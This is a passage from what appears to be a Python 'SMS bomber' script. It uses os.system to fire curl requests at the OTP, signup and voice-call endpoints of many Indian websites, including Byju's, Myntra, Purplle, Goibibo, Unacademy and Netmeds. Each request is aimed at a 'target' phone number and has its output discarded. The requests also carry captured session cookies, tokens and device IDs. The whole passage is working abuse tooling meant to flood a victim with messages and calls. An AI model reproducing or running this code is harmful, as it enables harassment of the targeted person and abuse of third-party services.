curl -X GET -H "Host:api.tjori.com" -H "Connection:keep-alive" -H "Accept:application/json, text/plain, */*" -H "User-Agent:Mozilla/5.0 (Linux; Android 10; CPH1933) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Mobile Safari/537.36" -H "Origin:https://www.tjori.com" -H "Sec-Fetch-Site:same-site" -H "Sec-Fetch-Mode:cors" -H "Sec-Fetch-Dest:empty" -H "Referer:https://www.tjori.com/" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-US,en;q=0.9" "https://api.tjori.com/api/v2/otp/?number='''+target+'''&=&country_prefix=91" > /dev/null 2>&1
''')
os.system('''
curl --http2 -X GET -H "Host:bcas-prod.byjusweb.com" -H "accept:*/*" -H "user-agent:Mozilla/5.0 (Linux; Android 10; CPH1933) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Mobile Safari/537.36" -H "content-type:application/x-www-form-urlencoded" -H "origin:https://byjus.com" -H "sec-fetch-site:cross-site" -H "sec-fetch-mode:cors" -H "sec-fetch-dest:empty" -H "referer:https://byjus.com/" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-US,en;q=0.9" "https://bcas-prod.byjusweb.com/api/voice?phoneNumber='''+target+'''&page=free-trial-classes" > /dev/null 2>&1
''')
os.system('''
curl --http2 -X POST -H "Host:www.littledesire.com" -H "content-length:65" -H "accept:*/*" -H "x-requested-with:XMLHttpRequest" -H "user-agent:Mozilla/5.0 (Linux; Android 10; CPH1933) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Mobile Safari/537.36" -H "content-type:application/x-www-form-urlencoded; charset=UTF-8" -H "origin:https://www.littledesire.com" -H "sec-fetch-site:same-origin" -H "sec-fetch-mode:cors" -H "sec-fetch-dest:empty" -H "referer:https://www.littledesire.com/register/" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-US,en;q=0.9" -H "cookie:__cfduid=db74c31b26da130b3e8df98be42153e4e1601928025" -H "cookie:PHPSESSID=isn5mrmtjks6rpf4samabcrfg5" -H "cookie:cookie_litrecentproducts=1600" -H "cookie:coock_litcurrency=INR" -H "cookie:coock_litcurrency_symbol=Rs." -H "cookie:coock_litcurrency_value=1" -H "cookie:_fbp=fb.1.1601928038653.1116247862" -H "cookie:coock_litcountryid=1" -H "cookie:coock_litcountry=India" -H "cookie:coock_litcountry_flag=t1415095440b1415114765_India-Flag.png" -d "name=Cyber+mafia&mobile='''+target+'''&emailID=cybermafia%40gmail.com" "https://www.littledesire.com/register/sendotp.php" > /dev/null 2>&1
''')
os.system('''
curl --http2 -X POST -H "Host:bcas-prod.byjusweb.com" -H "content-length:46" -H "accept:*/*" -H "user-agent:Mozilla/5.0 (Linux; Android 10; CPH1933) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Mobile Safari/537.36" -H "content-type:application/x-www-form-urlencoded" -H "origin:https://byjus.com" -H "sec-fetch-site:cross-site" -H "sec-fetch-mode:cors" -H "sec-fetch-dest:empty" -H "referer:https://byjus.com/" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-US,en;q=0.9" -d "phoneNumber='''+target+'''&page=free-trial-classes" "https://bcas-prod.byjusweb.com/api/send-otp" > /dev/null 2>&1
''')
os.system('''
curl 'https://www.cardekho.com/api/v1/account/find-user?business_unit=car&country_code=in&_format=json' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: application/json, text/plain, */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://www.cardekho.com/?utm_campaign=SER-Mob-Brand-Nonm&utm_device=c&utm_term=cardekho&network=g&utm_medium=cpc&utm_source=google&agid=44536557760&ap=&aoi=&ci=321014222&cre=354929124704&fid=&lop=1007753&ma=e&mo=&pl=&ti=kwd-296788571889&gclid=EAIaIQobChMIqa7_goaP7QIVF6uWCh1wvw7HEAAYASAAEgI1__D_BwE' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Connection: keep-alive' -H 'Cookie: AMP_TOKEN=%24NOT_FOUND; _ga=GA1.2.1025576193.1605803857; _gid=GA1.2.629529825.1605803857; _gac_UA-3882094-1=1.1605803857.EAIaIQobChMIqa7_goaP7QIVF6uWCh1wvw7HEAAYASAAEgI1__D_BwE; _gac_UA-3882094-17=1.1605803868.EAIaIQobChMIqa7_goaP7QIVF6uWCh1wvw7HEAAYASAAEgI1__D_BwE; _gat_universal=1; _gat=1; pwa_source={"isDesktop":true,"isMobile":false,"domain":"https://www.cardekho.com"}; first_query_params=dXRtX2NhbXBhaWduPVNFUi1Nb2ItQnJhbmQtTm9ubSZ1dG1fZGV2aWNlPWMmdXRtX3Rlcm09Y2FyZGVraG8mbmV0d29yaz1nJnV0bV9tZWRpdW09Y3BjJnV0bV9zb3VyY2U9Z29vZ2xlJmFnaWQ9NDQ1MzY1NTc3NjAmYXA9JmFvaT0mY2k9MzIxMDE0MjIyJmNyZT0zNTQ5MjkxMjQ3MDQmZmlkPSZsb3A9MTAwNzc1MyZtYT1lJm1vPSZwbD0mdGk9a3dkLTI5Njc4ODU3MTg4OSZnY2xpZD1FQUlhSVFvYkNoTUlxYTdfZ29hUDdRSVZGNnVXQ2gxd3Z3N0hFQUFZQVNBQUVnSTFfX0RfQndF; cd_session_id=38a3b5cd-7ded-4342-9566-35fd820aff35; firstUTMParamter=www.cardekho.com#referral#null; lastUTMParamter=google#cpc#SER-Mob-Brand-Nonm; SESSION=MzhhM2I1Y2QtN2RlZC00MzQyLTk1NjYtMzVmZDgyMGFmZjM1; _gcl_aw=GCL.1605803865.EAIaIQobChMIqa7_goaP7QIVF6uWCh1wvw7HEAAYASAAEgI1__D_BwE; _gcl_au=1.1.1841961311.1605803865; _co_session_active=1; _cc_id=93d2c5f785eb77cd67b03286df6b97ad; _gat_UA-3882094-17=1; _gac_UA-3882094-36=1.1605803868.EAIaIQobChMIqa7_goaP7QIVF6uWCh1wvw7HEAAYASAAEgI1__D_BwE; 
_CO_anonymousId=3e16e299-8be2-0a05-848e-31e42c5db2c8; _CO_type=connecto; CityId=51; leadForm=%7B%22choices%22%3A%7B%7D%2C%22formData%22%3A%7B%22cityName%22%3A%22Ahmedabad%22%2C%22cityId%22%3A%2251%22%7D%7D; usedcarcampaignquerystring="cityId=&connectoid=&sessionid=38a3b5cd-7ded-4342-9566-35fd820aff35&lang_code=en®ionId=0&agid=44536557760&aoi=&ap=&ci=321014222&cre=354929124704&fid=&gclid=EAIaIQobChMIqa7_goaP7QIVF6uWCh1wvw7HEAAYASAAEgI1__D_BwE&lop=1007753&ma=e&mo=&network=g&pl=&ti=kwd-296788571889&utm_campaign=SER-Mob-Brand-Nonm&utm_device=c&utm_medium=cpc&utm_source=google&utm_term=cardekho"; identifyCookie=eyJjYXJkZWtobyI6eyJfQ09faWQiOiIzZTE2ZTI5OS04YmUyLTBhMDUtODQ4ZS0zMWU0MmM1ZGIyYzgiLCJjYXJkZWtob0dDbGllbnRJZCI6IjEwMjU1NzYxOTMuMTYwNTgwMzg1NyIsImxvdGFtZV9waWQiOiI5M2QyYzVmNzg1ZWI3N2NkNjdiMDMyODZkZjZiOTdhZCJ9fQ==; CONNECTOID=3e16e299-8be2-0a05-848e-31e42c5db2c8; _fbp=fb.1.1605803875156.532383440' --data-raw 'cityId=51&connectoid=3e16e299-8be2-0a05-848e-31e42c5db2c8&sessionid=38a3b5cd-7ded-4342-9566-35fd820aff35&lang_code=en®ionId=0&subscribe=0&isPaidUser=false&mobileNo='''+target+'''&source=web' > /dev/null 2>&1
''')
os.system('''
curl 'https://zeus.housing.com/api/gql?compressed=true&isBot=false&source=web' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://housing.com/' -H 'phoenix-api-name: LOGIN_SEND_OTP_API' -H 'app-name: desktop_web_buyer' -H 'content-type: application/json; charset=UTF-8' -H 'Origin: https://housing.com' -H 'Connection: keep-alive' -H 'Cookie: userCity=94194ed7fe3a7423e9e5; cityUrl=ahmedabad; service=buy; category=residential; ssrExperiments=deals_pay_rent%3Dtrue%3Bapt_to_flat1%3Dtrue%3Bprominent_filter%3Dfalse%3Bgetcb_cta%3Dtrue%3Btest_ssr_experiment%3Dfalse%3Btest_ssr_experiment_2%3Dfalse%3Bshow_edge_hook_pdp%3Dfalse; experiments=hj%3Dtrue%3Bsentry%3Dfalse%3Bpyr%3Dtrue%3Bnearby_and_similar_listings_carousel%3DDEFAULT_NEARBY_NO_CLUSTERING%3Bfloor_plan%3Dtrue%3Bshow_rent_pay%3Dfalse%3Bone_tap_google%3Dtrue%3Btest%3Dtrue%3Bremove_70_30_experiment%3Dtrue%3Bdirect_connect%3Dfalse%3Bfilter_bar_revamp%3Dtrue%3Bnps_new%3Dtrue%3Brent_pg_toggle%3Dfalse%3Bdetails_flow%3Dfalse%3Bsticky_header%3Dtrue%3Bshow_req_callback%3Dtrue%3Bshow_rent_banner%3Dfalse; _ga=GA1.2.899300635.1605804364; _gid=GA1.2.1953344279.1605804364; _psid=1; traffic=sourcemedium%3Ddirect%20%2F%20none%3B; is_return_user=false; is_return_session=false; _gat=1; tvc_sm_fc_new=direct%7Cnone; tvc_sm_lc=direct%7Cnone; moe_uuid=7f15bf4a-9ed6-4d50-9e83-43e33a14f9ac; cto_bundle=Otv8OF9RdE1hZlB0b0NTN1FzaGIyJTJCMkhzek8ydEhiaVVDQThhTmxMdjh5aWlhWkhRM1ZkWnpkYWRCRXNublZQSTlraUxEOEhrSVBaaEpyYUtqbk1iQW1jViUyRndyU2d4MllTeXBjekJERDhaJTJCS09hVFRtdlpkUVhxR2NoMGo0NjdLcENPbEVHJTJCNUtpNW5ldDRDQ2cwMk41U1FEWm1McTJJQ2tFRWhLNGpzM1BIQnNpcyUzRA; G_ENABLED_IDPS=google; _hjid=9672142a-25b3-4ac5-b75e-7f92189498c3; _hjFirstSeen=1; _hjAbsoluteSessionInProgress=1; _uuid=8ae4d16be6dd207cc8bdf52b34a035a6' -H 'TE: Trailers' --data-raw 
'{"query":"____jsIh_jpM__jmG_jtx__jmG_jxZ__jkXifjvuhjtx___jtxjpM___jpMjxZ___jxZifjwsjsygg","variables":{"phone":"'''+target+'''"}}' > /dev/null 2>&1
''')
os.system('''
curl 'https://www.myntra.com/gateway/v1/auth/getotp' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://www.myntra.com/login?referer=https://www.myntra.com/?utm_source=Google&utm_medium=cpc&utm_campaign=Search%20-%20Myntra%20Brand%20(India)&gclid=EAIaIQobChMIq-jN6YiP7QIVKMIWBR0jJAQdEAAYASAAEgKDQvD_BwE' -H 'X-Sec-Clge-Req-Type: ajax' -H 'X-myntraweb: Yes' -H 'x-myntra-network: yes' -H 'X-Requested-With: browser' -H 'x-location-context: pincode=380001;source=IP' -H 'x-meta-app: deviceId=46b5b813-2027-45fd-beb4-32a59e05c339;appFamily=Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0;reqChannel=web;channel=web;' -H 'Content-Type: application/json' -H 'deviceId: 46b5b813-2027-45fd-beb4-32a59e05c339' -H 'Connection: keep-alive' -H 'Cookie: _mxab_=config.bucket%3Dregular%3Bweb.xceleratorTags%3Denabled; _pv=default; dp=d; at=ZXlKaGJHY2lPaUpJVXpJMU5pSXNJbXRwWkNJNklqRWlMQ0owZVhBaU9pSktWMVFpZlEuZXlKdWFXUjRJam9pWVRJME9UZ3laamt0TW1FNE55MHhNV1ZpTFRnME5HVXRNREF3WkROaFpqSTRaVE5tSWl3aVkybGtlQ0k2SW0xNWJuUnlZUzB3TW1RM1pHVmpOUzA0WVRBd0xUUmpOelF0T1dObU55MDVaRFl5WkdKbFlUVmxOakVpTENKaGNIQk9ZVzFsSWpvaWJYbHVkSEpoSWl3aWMzUnZjbVZKWkNJNklqSXlPVGNpTENKbGVIQWlPakUyTWpFek5UWTNOVGtzSW1semN5STZJa2xFUlVFaWZRLnZxTWxxYXVPWkNQaXVTQUtFLVg0ZW5XV2FaQzlzZEp0QTNsbjRJNTFPTDA=; bc=true; xid=a24982f9-2a87-11eb-844e-000d3af28e3f; utm_track_v1=%7B%22utm_source%22%3A%22%22%2C%22utm_medium%22%3A%22cpc%22%2C%22utm_campaign%22%3A%22Search%20-%20Myntra%20Brand%20(India)%22%2C%22campaign_id%22%3A%22%22%2C%22octane_email%22%3A%22%22%2C%22trackstart%22%3A1605804814%2C%22trackend%22%3A1605804874%7D; lt_timeout=1; lt_session=1; utrid=uuid-16058047596718; AKA_A2=A; 
ak_bmsc=3B01352D11AC0DFBF8DC544FEEB6A54B312C8ACDF4610000D7A2B65F6EC1A61C~pltptOuzGbCRuGEF6xTFznwwu1f6UXKTDXXtT9KoJua+NP0WxZedn5bRaD2KNlYczYOf0PWlE4ep9kpBhLm+Mre5L7S0qpo8On/iIESULsoKvoITZVPuK/i+8H84J/UAhJXJhYzcWSaYkRz/KJrFWBJkwzfvlF2pjciO1bgFiBO4OrmHgvGGPDheHHDpr3w6HJOytXTBLC6zXtmmUsl9qVZigmn7b9I9jOJAd7uYC2eWtrvdpVsGRkM1DHOVHQqFCN; akaas_myntra_SegmentationLabel=1608396814~rv=59~id=dc0e14339a7e60f27d59401941912506~rn=PWA; bm_sz=7B08ACDA24B9EE915C3F1C2347E2778E~YAAQzYosMVYlIIh1AQAApBps4QmRf+OBjdtnOHLMKTDIe6EFrLZfo2BIavicm5Xpx/CB6nHpJM2ayFwJjILxs5lPT58okC5jLJndx6+5rgDh7kxgQoQLu2wjt0YAJTop503HMl1dgPaAzQHT+X8Rq5YalTclnDXSmq8y5eSrRHGMQnymNs8W0aFpIMk5Dtr9; _abck=9EAE6DD4148165662059F755B3D0147F~0~YAAQzYosMagnIIh1AQAACZ1s4QTdjzQ/tYQ0xSQsz1AmJMyXU2R1udwaE2QoQwLh69rzWrMSGwP/ykgne4M6/lCB6LzEinsLgY/7PkBf8N+DLQaTHwBM68u0TwGQfLDIM9AVR6JjpqXK6YgdxaFYM8mzxVVT8OhhwwTpcxIqwVrP7FfYserPUe/KN22clYRrWV+6qnXnljR8gc70vq6SCx5shukFI8NnwHTyU79lCfQO3iEQAK6NndyKbOCciIN1CPwfT4hYFfPK0a7AwLES6IL0HeFUIX18v/j7r2HG9u+EjBwQ+HvgI18/U1w9xyNr1VbY2UOZY3+BwIawAkohUHaKOhLFRg==~-1~-1~-1; _d_id=46b5b813-2027-45fd-beb4-32a59e05c339; _ma_session=%7B%22id%22%3A%221c0d4e1d-3750-42ed-b1d2-9eea1e0f432c-46b5b813-2027-45fd-beb4-32a59e05c339%22%2C%22referrer_url%22%3A%22https%3A%2F%2Fwww.google.com%2F%22%2C%22utm_medium%22%3A%22cpc%22%2C%22utm_source%22%3A%22Google%22%2C%22utm_channel%22%3A%22cpc%22%2C%22utm_campaign%22%3A%22Search%20-%20Myntra%20Brand%20(India)%22%7D; _ma_events_sequence=14; microsessid=708; _xsrf=IXkzSibsIm9aRShCDg631HEw99gc6TMK; user_session=YH42CFeKV7r2qBUsTT-sSg.CYkYZ_oZG89jckCZiUmJAvZ3v0s9BxVNKQlyuJgOxe5vG79IJIeZ4YKPHoKORY5vtxbaHsV4LIyjgeXe8RI1u3ZRn7rsBWLBws-yQ_Izoy-dRHY_y-ggnj_WIWNzo231htZJfn0VOH-3RBMXjPCavw.1605804763097.86400000.lHhIKnNdQSsIPdaehWgDv5Oh0YmUKmCKulQs_pc_Atw; bm_sv=EBF7FA7F28AB93306597CDBD2127B038~5WknPn22D1cle7mu5A6zyY5gbElYfJ+EtXQnfNSHEtoOUlw3jTFHoPh4IzFuqGrF7Xvb8PL55dkEUOVUcCJFOMRgXEd/y3DuxYAipXGZYuSlOCXsAzsEchWm90BgWO1Mnuo+nApmKQRu7++SDK8J2TTlYX9uUCDp5yEm0xI+0Ck=; 
mynt-eupv=1; AMP_TOKEN=%24NOT_FOUND; mynt-ulc-api=pincode%3A380001; mynt-loc-src=expiry%3A1605806065619%7Csource%3AIP; _ga=GA1.2.991137991.1605804626; _gid=GA1.2.263544867.1605804626; _gac_UA-1752831-18=1.1605804675.EAIaIQobChMIq-jN6YiP7QIVKMIWBR0jJAQdEAAYASAAEgKDQvD_BwE; ak_RT="z=1&dm=myntra.com&si=b6edc5d2-549a-4571-b073-909b00326f53&ss=khp2lyh7&sl=2&tt=4ej&obo=1&rl=1"; _gcl_aw=GCL.1605804690.EAIaIQobChMIq-jN6YiP7QIVKMIWBR0jJAQdEAAYASAAEgKDQvD_BwE; _gcl_au=1.1.1794472781.1605804627; tvc_VID=1; _fbp=fb.1.1605804627724.884732793; G_ENABLED_IDPS=google; __insp_wid=617845923; __insp_slim=1605804680422; __insp_nv=true; __insp_targlpu=aHR0cHM6Ly93d3cubXludHJhLmNvbS9sb2dpbj9yZWZlcmVyPWh0dHBzOi8vd3d3Lm15bnRyYS5jb20vP3V0bV9zb3VyY2U9R29vZ2xlJnV0bV9tZWRpdW09Y3BjJnV0bV9jYW1wYWlnbj1TZWFyY2glMjAtJTIwTXludHJhJTIwQnJhbmQlMjAoSW5kaWEpJmdjbGlkPUVBSWFJUW9iQ2hNSXEtak42WWlQN1FJVktNSVdCUjBqSkFRZEVBQVlBU0FBRWdLRFF2RF9Cd0U%3D; __insp_targlpt=TXludHJh; __insp_norec_sess=true; _gat=1' --data-raw '{"phoneNumber":"'''+target+'''"}' > /dev/null 2>&1
''')
os.system('''
curl 'https://www.purplle.com/api/account/authorization/send_otp?phone='''+target+'''&action=register' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: application/json, text/plain, */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://www.purplle.com/login' -H 'newrelic: eyJ2IjpbMCwxXSwiZCI6eyJ0eSI6IkJyb3dzZXIiLCJhYyI6IjIxNzQ4NDMiLCJhcCI6IjEwMTg3NTgwNjUiLCJpZCI6IjhkNWQ3NjVkNjNmYWQwNzUiLCJ0ciI6ImYxOWE0OWYwZTExNGVlMDJmZDBkMjJkYjE0NjQ0M2EwIiwidGkiOjE2MDU4MDYxMDc3OTF9fQ==' -H 'traceparent: 00-f19a49f0e114ee02fd0d22db146443a0-8d5d765d63fad075-01' -H 'tracestate: 2174843@nr=0-1-2174843-1018758065-8d5d765d63fad075----1605806107791' -H 'Content-Type: application/x-www-form-urlencoded' -H 'token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXZpY2VfaWQiOiJVV1Y2TndSbmhKMndRM1R5U2EiLCJtb2RlX2RldmljZSI6ImRlc2t0b3AiLCJtb2RlX2RldmljZV90eXBlIjoid2ViIiwiaWF0IjoxNjA1ODA2MTMyLCJleHAiOjE2MTM1ODIxMzIsImF1ZCI6IndlYiIsImlzcyI6InRva2VubWljcm9zZXJ2aWNlIn0.7KOOZqrvyunuXk5HWHEyBYILwHlBE5qPfuMsnPf2Ir4' -H 'device_id: UWV6NwRnhJ2wQ3TySa' -H 'Connection: keep-alive' -H 'Cookie: __cfduid=d4398fd17981d86c2371424cf96fc01241605806132; mode_device=desktop; visitorppl=UWV6NwRnhJ2wQ3TySa; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXZpY2VfaWQiOiJVV1Y2TndSbmhKMndRM1R5U2EiLCJtb2RlX2RldmljZSI6ImRlc2t0b3AiLCJtb2RlX2RldmljZV90eXBlIjoid2ViIiwiaWF0IjoxNjA1ODA2MTMyLCJleHAiOjE2MTM1ODIxMzIsImF1ZCI6IndlYiIsImlzcyI6InRva2VubWljcm9zZXJ2aWNlIn0.7KOOZqrvyunuXk5HWHEyBYILwHlBE5qPfuMsnPf2Ir4; sessionCreatedTime=1605805996; sessionExpiryTime=1605807900; _tmpsess=UWV6NwRnhJ2wQ3TySa_1605806133; session_initiated=Direct; client_ip=103.249.233.70; environment=prod; __cf_bm=2cf03eca74ff5b00160a5b2489d19fa3bb5c9cf2-1605806133-1800-Ae1ffGohF5vDKq/Cn/Y2oPsOjyG6Z8Ww7FIkIfZsHlMH0V0+Wvgcw781SThdpijW5Uym1Jk7dgtCfgxpa4NDakQ=; __cfruid=f000636a2afed6e7d6688d31092a30c34b07e91a-1605806133; g_state={}; beautyProfilePopup=1; 
session_id=9f7c5991c4d882843c2b90dd7f0247e3; isSessionDetails=true; _gcl_au=1.1.1994578886.1605806010; _ga=GA1.2.997997447.1605806011; _gid=GA1.2.294360080.1605806011; _fbp=fb.1.1605806017856.964469739; cto_bundle=uM7QM19xJTJGOW1DcjhVdW5aN1BqUW4zQUhYZnB1UTFWeTJtQ2hRZEN6V1M3TnB4UzJTUkVHbmlFSTh4YnlIck1MUGZzWjNhNSUyRlJDcmhrRmhTSSUyQnhvWnpnSjVTVzc2NzVxcDRtbzEzOVFOSGFkeTRlOTd2OXJLZWl3JTJGZ3NxcTZJSVhQJTJCQjl6TVVWTSUyQiUyRjkzMFlYYW55OEZlU1ducGJsa3dKRGhvNjJwdHRyQjVGbk5pTSUzRA; _gat_UA-28132362-1=1' -H 'TE: Trailers' > /dev/null 2>&1
''')
os.system('''
curl 'https://www.goibibo.com/auth/v2.0/ask_otp/?intent=signup&phone='''+target+'''&gi_source=gi_iden' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://www.goibibo.com/accounts/login/' -H 'Connection: keep-alive' -H 'Cookie: sessionid=ed2dy8fw5kxe6m9zyawdfk6pn7d8z1y2; ak_bmsc=E59BAC9EDB10F9AE1092F2982D8449A4312C8CC6B022000027ABB65F21FB0601~plwLYWua8+d2U3XkYAs2LRwxrzEhFH1qyc3n0rRNYOeDhrInqD0cMfJiTl/m1xnYUpoS5F1uwU+kB/1HKNV202yHCf6naKaOteJXFjN5zrciLackQYxYSi4KXP3J2u47cUR6RkdMy5rZo6x4Xsx0a5ahF0J861OXzBy+++43u3FhLhqGgeOKm3AIIELm8e4Jj7CeeQ/+pq7hVivw26uGUEGvf0ZDDkI7KqjLlLxt6wT6jcZOR/Gm+CHNb4ARttIUdW; bm_sz=50C92C5E476FA452B6CB32C436CF9609~YAAQxowsMXhpLqJ1AQAAfpCM4Qkksxh4hyhct+cSt5aS3TY+1dsYAwVFgyYvdG9WCHjGZRoIc2prLzqa+FcZRDBo25HqYoz6bAdUsvQXEhxj3bep1Sfz4vtfpVu26ljdTN58MyR3BZvznCcwOXneCbciIpV2Pf1lNkkX0h9OtXjedyIkIxKC9hjI1uwNO5Z0ZA==; _abck=A296CB1B466514566FF12C0D4322F0E6~-1~YAAQxowsMalpLqJ1AQAAKfuM4QTDCdvc0rWRJYhDIpf+s/FzuFXLVO70XrMDTPLP58udmZdehokQSeBPLQf9P28s6DokR6nvR6J7APGZ/FelmwaXGct1h/jBekCxfpxKG9nuLTnAUQ3etrsv9TVTq0XD0r34EsLnwN3kt058XN8LaZwpgfdX95eidrgtQbaLr1M72QKThhzV0wr9deeSZ25d3j8fOt8Ykv1FitBxEPkSpGn9xN01obSVAcmnF+CPEEwRNVDQGglohwRAdct5KQMBcVT77U5JCB3oNsTTZuvhogo7WBDenHLQ7/7iGmEQ/j8EVqCukYjDxHQtJOqfOud6fvo4tdw=~0~-1~-1; bm_sv=0D9388B541F6127BA354C60604D39224~RbEnoZYD+MauCH6Km0XgHtWBIzk+YDo/a3A/DuogWhLGnmLhduMWW8iHFMbZ2N5AhghnC9LyMClhfy2eBQnGzAbWHd6xL6kLRlgQ7fkKNs4RMz2e2wEFzXszPGZT++7NoGsx05GY6zOgospnsti2+fuDHUkgfdiirSnRQMRmWvk=' -H 'Upgrade-Insecure-Requests: 1' -H 'TE: Trailers' > /dev/null 2>&1
''')
os.system('''
curl 'https://unacademy.com/api/v3/user/user_check/' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://unacademy.com/login' -H 'authorization: Bearer undefined' -H 'Content-Type: application/json' -H 'X-Platform: 0' -H 'Origin: https://unacademy.com' -H 'Connection: keep-alive' -H 'Cookie: lux_uid=160580827996552921; mp_535208d541f9b5935ef91a365b0439e1_mixpanel=%7B%22distinct_id%22%3A%20%22175e1a1d9d23-0f90f9db57a3998-31634645-e0716-175e1a1d9d487%22%2C%22%24device_id%22%3A%20%22175e1a1d9d23-0f90f9db57a3998-31634645-e0716-175e1a1d9d487%22%2C%22Platform%22%3A%20%22Desktop%22%2C%22%24search_engine%22%3A%20%22google%22%2C%22%24initial_referrer%22%3A%20%22https%3A%2F%2Fwww.google.com%2F%22%2C%22%24initial_referring_domain%22%3A%20%22www.google.com%22%7D; anonymous_session_id=a3a30e3d-e357-4075-a408-8a83edacdde4; _ga=GA1.2.1265900968.1605808284; _gid=GA1.2.1040017715.1605808284; _anonymous_id=Q-94616; _gcl_au=1.1.1096510721.1605808293; _fbp=fb.1.1605808295710.1397696204; afUserId=1279ff42-4f26-4e23-8da8-116480de04b8-p' -H 'TE: Trailers' --data-raw '{"phone":"'''+target+'''","country_code":"IN","otp_type":1,"email":"","send_otp":true,"is_un_teach_user":false}' > /dev/null 2>&1
''')
os.system('''
curl 'https://www.netmeds.com/mst/rest/v1/id/details/'''+target+'''' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: application/json, text/plain, */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://www.netmeds.com/customer/account/login' -H 'Connection: keep-alive' -H 'Cookie: _ALGOLIA=anonymous-ef5a7b35-f6b3-473a-8da2-87b382d4b9f4; _gcl_au=1.1.1413759472.1605808879; nms_mgo_pincode=110001; _ga=GA1.2.2088543025.1605808880; _gid=GA1.2.1818116564.1605808880; _fbp=fb.1.1605808881486.839169445; _gat_UA-63910444-1=1; cto_bundle=tuIO2F9xJTJGOW1DcjhVdW5aN1BqUW4zQUhYZmxmR1drYVBqdGlKQjc1NXB1TGRyQTQ4Z2pXNGdtc3NZNjhsZUVaZ0JLdFBVUFJqMkF1b0t2WHJ2SlZMYjZYR0UyMXE3REZVblpGalB0VXVXQ1RMRU1RSkJuTzVoa1hnYldKUnY3N3BQRiUyQkowa2VyV2xlRXFsdmclMkJFY0VMUGxBOHhlSEluMUJwU0ZsR3JtQkkxd2NqQjQlM0Q; bsUl=0; _gat=1; G_ENABLED_IDPS=google; _uetsid=3a6a6ed02a9111ebb4b94dd739e83e07; _uetvid=3a6b21e02a9111eba95a6fbf22726b3e; bsCoId=3605809031100' > /dev/null 2>&1
''')
os.system('''
curl 'https://www.aakash.ac.in/anthe/global-otp-verify' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://www.aakash.ac.in/anthe?gclsrc=aw.ds&&utm_source=Google_Search&utm_medium=akash&utm_content=Aakash&utm_campaign=AKINT_ANTHE_2020_Search_Brand_Core_Exact&gclid=EAIaIQobChMI36vu9pqP7QIVGsEWBR0XYweVEAAYASAAEgIb0PD_BwE' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Connection: keep-alive' -H 'Cookie: AWSALB=33WuA+1Wo/9o9qsN5+ItaMflaNVSH9axLemPCpKg3DVqMGr2739I1CdoIOq36iGTxIUA/lup/aoYF9I62iVmUvBNDBxR1RJYSyRzY5PvueN2udkznI45dfQ8P6cp; AWSALBCORS=33WuA+1Wo/9o9qsN5+ItaMflaNVSH9axLemPCpKg3DVqMGr2739I1CdoIOq36iGTxIUA/lup/aoYF9I62iVmUvBNDBxR1RJYSyRzY5PvueN2udkznI45dfQ8P6cp; SESSa0e8f32479e6dd02f90001de8e7dd4a7=vWAFVC4ideLy7Zj5Y7QW0xToqekCRQv5EvIrZ0V82So; _gcl_aw=GCL.1605809480.EAIaIQobChMI36vu9pqP7QIVGsEWBR0XYweVEAAYASAAEgIb0PD_BwE; _gcl_dc=GCL.1605809480.EAIaIQobChMI36vu9pqP7QIVGsEWBR0XYweVEAAYASAAEgIb0PD_BwE; _gcl_au=1.1.143739277.1605809480; _ga=GA1.3.1508480274.1605809483; _gid=GA1.3.426604834.1605809483; _gac_UA-30079688-1=1.1605809520.EAIaIQobChMI36vu9pqP7QIVGsEWBR0XYweVEAAYASAAEgIb0PD_BwE; _uetsid=a2183b802a9211ebb3b13982254008e2; _uetvid=a2192a502a9211ebbb9a8f22d3b913a0; _gat_UA-30079688-1=1; _fbp=fb.2.1605809486165.1093833284; outbrain_cid_fetch=true' -H 'TE: Trailers' --data-raw '&mobileparam='''+target+'''&global_data_id=anthe-otp&student_name=&corpid=undefined' > /dev/null 2>&1
''')
os.system('''
